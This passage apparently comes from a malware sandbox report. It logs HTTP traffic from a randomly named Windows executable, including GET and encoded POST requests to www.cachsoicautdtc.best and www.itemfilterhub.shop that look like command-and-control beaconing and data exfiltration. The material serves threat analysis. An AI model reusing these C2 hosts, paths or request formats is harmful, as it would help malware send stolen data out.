                                                                                                                                                                                                                                                              Data Raw: 36 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 b8 11 fe ee 5f 31 51 81 c4 06 2c c9 de db 97 ac 23 ab b8 ee a6 40 80 2d 6e 7b 9b 45 bb 38 2c 02 8a 1c 59 bc 50 a4 4a 52 56 8c 34 ff bd a0 28 d9 f2 4b 72 5d b4 40 80 88 e2 f0 99 99 87 cf 8c 48 27 67 1f 7f f9 70 fb ed f3 35 14 b6 14 e9 28 39 0b c3 df 78 0e c2 c2 cd 35 bc fb 9e 42 e2 26 80 0a 62 cc 32 90 2a fc dd 00 c7 b7 a0 04 e3 18 80 20 72 b5 0c 50 86 5f bf 04 29 24 67 bf a1 64 3c ff 1e 86 3b a8 0e 07 e0 34 d4 bb 1f 83 ba 7c 01 ea f2 07 a0 56 b6 43 73 2f 4e 65 79 8c 12 86 fb 48 05 12 96 8e 12 cb ad c0 f4 67 6b 51 5a ae 24 fc 8a ff aa b9 46 76 06 ff 86 0f 42 d5 2c 17 44 63 12 7b bb 51 52 a2 25 40 0b a2 0d da 65 f0 f5 f6 af e1 65 00 71 3f 51 58 5b 85 0e 61 bd 0c 3e 28 e9 40 c3 db 4d 85 01 50 3f 5a 06 16 1f 6c ec e2 bd da c2 bc 84 f2 cf f0 eb cf e1 07 55 56 c4 f2 4c 0c 81 6e ae 97 d7 6c 85 83 75 92 94 b8 0c b4 ca 94 35 03 43 a9 b8 64 f8 30 05 a9 72 25 84 6a 8e 96 ac 39 36 95 d2 76 b0 a8 e1 cc 16 4b 86 6b 4e 31 6c 07 53 2e b9 e5 44 84 86 12 81 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 6ceXmo_1Q,#@-n{E8,YPJRV4(Kr]@H'gp5(9x5B&b2* rP_)$gd<;4|VCs/NeyHgkQZ$FvB,Dc{QR%@eeq?QX[a>(@MP?ZlUVLnlu5Cd0r%j96vKkN1lS.DG\F4e@;*PhAL~*yZ+m(>..v.8:/ch_a)y,^q]U1.WSh@tgGW6gX#=kI2l#WL5az~D=:|R!B^KsX%0EVhlnDnu2j7 XE&vO
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.983345032 CEST1178INData Raw: 93 11 c0 d3 28 89 fb d4 8e aa 68 34 4a e2 ae 90 1c 77 2e f9 84 f1 75 b7 ff 61 a3 49 55 a1 0e d2 16 ae 9d e9 8a 94 e6 3e 24 e8 1f c2 76 83 dc b0 8b b8 1d 77 4a 1a e4 10 00 23 96 84 56 13 69 04 b1 e8 4a dc 11 7b e7 8d 4c 90 7e 16 48 0c 82 7f dd 65
                                                                                                                                                                                                                                                              Data Ascii: (h4Jw.uaIU>$vwJ#ViJ{L~Hej$f|=2W3&9Jv;6GPkK]%~.1H(7SF%F^"1uILEeoX~&@(NImQ&qjKFKQ+\Zv\U!CrN2
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.983355999 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              12192.168.11.2049753172.67.191.24180900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.499568939 CEST556OUTGET /fp5q/?9B6h=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610013962 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:38:30 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m80Cn95ZP8xe5WAgDf%2FeBKhbqCPOih%2F0niV1q%2FAUvyklueH1kQuNds19p8t%2F5z06iqaXqf1brZAWVuvdkAIEQaBixsMbAdHh1bVHZVNe3YcrYYcOQTI2HvCWW1%2FVp47CqCyXBooR15n62w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1557298f42e0-EWR
                                                                                                                                                                                                                                                              Data Raw: 31 31 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 11ab<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" />
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610105991 CEST1289INData Raw: 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22
                                                                                                                                                                                                                                                              Data Ascii: <meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.err
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610236883 CEST1289INData Raw: 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20
                                                                                                                                                                                                                                                              Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-c
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610250950 CEST1289INData Raw: 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52
                                                                                                                                                                                                                                                              Data Ascii: <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8cfe1557298f42e0</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610261917 CEST87INData Raw: 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d
                                                                                                                                                                                                                                                              Data Ascii: pper --> <script> window._cf_translation = {}; </script></body></html>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610315084 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              13192.168.11.2049754104.21.50.20280900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.839765072 CEST829OUTPOST /p1v4/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.itemfilterhub.shop/p1v4/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 79 58 63 43 43 36 43 46 6a 6c 33 79 42 2b 62 4c 31 71 66 4d 6c 59 6e 4a 72 37 6b 6c 31 4d 47 76 5a 6f 2f 4b 7a 33 62 4e 73 6d 6b 36 6c 43 33 70 2f 4c 74 41 54 69 46 73 38 4d 6b 73 4b 7a 58 72 77 67 56 58 61 48 50 34 32 45 58 4e 5a 6d 48 34 4e 2f 7a 31 53 55 70 52 41 75 4e 65 69 6a 75 67 6c 37 42 58 6b 79 64 59 57 73 4a 72 46 46 7a 64 64 54 30 42 59 7a 66 4b 2f 47 63 53 70 36 4e 72 64 66 5a 73 4f 31 2b 4a 67 65 6a 2f 6f 72 4f 62 32 57 44 32 2f 55 31 7a 30 56 6a 64 53 51 4e 63 32 45 78 75 38 39 46 75 2f 62 59 48 65 53 58 36 78 4b 64 77 41 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=aUfPfTh9K6lI4yXcCC6CFjl3yB+bL1qfMlYnJr7kl1MGvZo/Kz3bNsmk6lC3p/LtATiFs8MksKzXrwgVXaHP42EXNZmH4N/z1SUpRAuNeijugl7BXkydYWsJrFFzddT0BYzfK/GcSp6NrdfZsO1+Jgej/orOb2WD2/U1z0VjdSQNc2Exu89Fu/bYHeSX6xKdwA==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:21.259969950 CEST743INHTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:21 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AIWC55kW3X3%2FcYvTaNzkwkb0SNc%2BNT5XCawce8u9Yf1%2FKD50yY3gWrceg7ObjBd5qdi5QQ2f6kEmG3rB%2F98Z0nmfJV4gLE0HZTuEyIoUvMd8D%2BVUD7n6XygaeNXE77flRBrLLd9kdjg%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1578884d7280-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 03 00 96 12 38 3e a1 00 00 00 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 89\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk8>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:21.260082006 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              14192.168.11.2049755104.21.50.20280900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.467556000 CEST849OUTPOST /p1v4/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.itemfilterhub.shop/p1v4/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 53 48 63 41 6a 36 43 48 44 6c 30 2b 68 2b 62 42 56 71 62 4d 6c 45 6e 4a 75 58 30 6c 44 63 47 73 38 4d 2f 4a 79 33 62 45 38 6d 6b 78 46 43 79 30 76 4c 69 41 54 75 33 73 39 77 6b 73 4a 50 58 72 78 77 56 58 70 76 4d 35 6d 45 56 42 35 6d 4a 6c 64 2f 7a 31 53 55 70 52 42 4c 57 65 69 72 75 68 56 4c 42 57 47 4b 65 62 57 73 4b 2f 56 46 7a 4c 64 54 34 42 59 79 49 4b 36 76 35 53 76 2b 4e 72 66 48 5a 74 66 31 39 51 51 65 6c 67 34 71 78 57 58 58 6e 7a 39 63 2b 33 6d 5a 4b 54 48 6f 58 64 67 56 72 7a 4f 4a 68 74 73 48 71 44 75 72 2f 34 7a 4c 47 74 47 51 45 70 6b 52 44 44 69 56 44 44 4e 6f 35 6b 66 45 76 75 65 73 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=aUfPfTh9K6lI4SHcAj6CHDl0+h+bBVqbMlEnJuX0lDcGs8M/Jy3bE8mkxFCy0vLiATu3s9wksJPXrxwVXpvM5mEVB5mJld/z1SUpRBLWeiruhVLBWGKebWsK/VFzLdT4BYyIK6v5Sv+NrfHZtf19QQelg4qxWXXnz9c+3mZKTHoXdgVrzOJhtsHqDur/4zLGtGQEpkRDDiVDDNo5kfEvues=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.711045027 CEST731INHTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:23 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sPDkqJTcXfDyauy2SIWOH0gSxDEm3LcKYwlPtASNh7I82in%2FQkv3qzapVswl%2B%2FLkj%2BeOmdpjXdxFTWuo0kE3iYelYapqS0sRR0ousmPEAzhECABs36DtdRvgSefKan7h5D7%2BuUyhxIvI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1588fc5a43d3-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 37 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 7f\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.711055994 CEST20INData Raw: 61 0d 0a 03 00 96 12 38 3e a1 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: a8>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              15192.168.11.2049756104.21.50.20280900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.092662096 CEST1289OUTPOST /p1v4/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.itemfilterhub.shop/p1v4/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 53 48 63 41 6a 36 43 48 44 6c 30 2b 68 2b 62 42 56 71 62 4d 6c 45 6e 4a 75 58 30 6c 44 55 47 73 4b 41 2f 4c 52 66 62 65 38 6d 6b 2b 56 43 7a 30 76 4c 37 41 51 65 7a 73 39 38 65 73 50 4c 58 71 57 77 56 41 6f 76 4d 77 6d 45 56 4a 5a 6d 49 34 4e 2b 78 31 53 45 74 52 42 62 57 65 69 72 75 68 58 54 42 57 55 79 65 64 57 73 4a 72 46 46 2f 64 64 53 74 42 65 62 39 4b 36 6a 48 53 66 65 4e 72 2f 58 5a 68 4e 64 39 50 67 65 6e 68 34 71 70 57 53 50 34 7a 39 77 49 33 6e 74 67 54 41 30 58 66 55 59 49 75 39 6c 41 78 73 36 6d 4a 75 37 38 2b 41 4c 58 67 58 6b 72 76 53 42 70 4e 33 70 42 45 66 34 4d 30 4e 31 75 33 70 57 56 58 34 73 75 39 51 76 31 4b 5a 58 52 6c 59 59 31 69 45 2f 61 42 31 35 39 41 4b 34 76 55 79 35 66 67 41 7a 6b 2f 7a 65 6b 45 76 46 66 71 2b 50 69 44 43 51 5a 6b 55 45 6c 34 56 75 73 37 42 47 76 77 48 34 63 6e 54 76 65 36 51 4e 4a 6f 6c 38 6a 64 4d 38 64 34 51 4a 57 64 54 39 41 4d 6b 67 6b 72 4d 6a 73 33 39 64 4c 75 45 6f 45 64 4c 6a 4d 67 33 51 49 6d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=aUfPfTh9K6lI4SHcAj6CHDl0+h+bBVqbMlEnJuX0lDUGsKA/LRfbe8mk+VCz0vL7AQezs98esPLXqWwVAovMwmEVJZmI4N+x1SEtRBbWeiruhXTBWUyedWsJrFF/ddStBeb9K6jHSfeNr/XZhNd9Pgenh4qpWSP4z9wI3ntgTA0XfUYIu9lAxs6mJu78+ALXgXkrvSBpN3pBEf4M0N1u3pWVX4su9Qv1KZXRlYY1iE/aB159AK4vUy5fgAzk/zekEvFfq+PiDCQZkUEl4Vus7BGvwH4cnTve6QNJol8jdM8d4QJWdT9AMkgkrMjs39dLuEoEdLjMg3QImKhNBejpR6TN5XgGv8i1o3IzhYaBDJE5hdDZh8pqCglO74PcVF/Y2EECTfPHa3fHBvL7ncBiTMr8/EB3ZaFdBWD+tFMcZmRyLgP4x2xp6fmngiuiirxIzx6IXi+4/3Q7pdKU8LmzehxoxVlUYWPaoL2TjiZyIFQ09VOES3I9WgCgi8TNsixjP8aR2Y4OV2Yf+RrJ0+NwNgwrcc7Ey5kTLWt4b0memnKUAu4ldd7DiULOjukUtRombNoUoR0yQkI4z+cpLgauaKd0/R7IYVuRO+eIu7GtLMBb5zbLW9Qqhakak6g6VIhJZdAO29guy8c9dAq
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.092710018 CEST1289OUTData Raw: 59 41 66 62 6a 64 73 78 45 64 6a 49 55 44 32 4d 64 72 61 37 46 4b 75 38 42 74 44 37 6f 45 50 62 6e 6b 6d 37 33 6d 6c 75 58 39 44 35 41 63 65 74 65 48 77 74 4d 59 78 41 62 46 6f 63 46 63 4d 56 5a 33 33 30 2f 46 32 6f 61 62 49 76 70 55 61 39 31 56
                                                                                                                                                                                                                                                              Data Ascii: YAfbjdsxEdjIUD2Mdra7FKu8BtD7oEPbnkm73mluX9D5AceteHwtMYxAbFocFcMVZ330/F2oabIvpUa91V472VHqtiRWHaHlGAKbJmwpEwLQWjwCXXsRwA1fDwyBEPuowjiWWUe8AngsHC6sZ17RjdLXDCUFE2gciN+ILQB6AmlrKpkUBC4QPYIc9jskYkPdE3cYWFOpXRYeWFUZN6oephpUkVKwSlbmws3eqt12WIfX6EJ4C9g
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.092760086 CEST5420OUTData Raw: 39 57 45 7a 39 43 49 74 33 63 59 46 50 74 41 78 63 68 5a 63 66 78 69 39 53 34 75 38 4a 71 59 2b 6b 66 65 30 78 34 4a 75 77 38 54 51 4f 55 48 74 59 46 51 30 58 35 45 72 4e 67 45 71 73 37 5a 37 35 70 34 43 6c 42 4b 71 4f 4c 55 53 78 71 35 58 6c 49
                                                                                                                                                                                                                                                              Data Ascii: 9WEz9CIt3cYFPtAxchZcfxi9S4u8JqY+kfe0x4Juw8TQOUHtYFQ0X5ErNgEqs7Z75p4ClBKqOLUSxq5XlISBwqe7APtpyqI9EkmvjsnME2yRVAtMH5YClhVPVkWtNLNaLR2M/yqU35wdYihPNmbHjuRR4l4o+RZ02EweIm+9W8CXvRgl6knhzO1V1o50iEumshQwtN/E+ftpOyQSXhmYwTV2XW1Qw9ZLJ5kWtrk1XEhgt+iFzVb
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.963123083 CEST733INHTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:26 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CPV7BotGrHneZ3RbIHENEFxkS8XKxBk%2BZXp0saSmPtAfKjYLGLKnz2sKrY6ptGlVn2TXC3U6fW2VqkVUJiU66KpYZHZtRsijCFxdnLobLg4Zj51vs0U6WTza8CLNBQ9WEFHlNlehxfOt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe15995d1219c7-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 03 00 96 12 38 3e a1 00 00 00 0d 0a
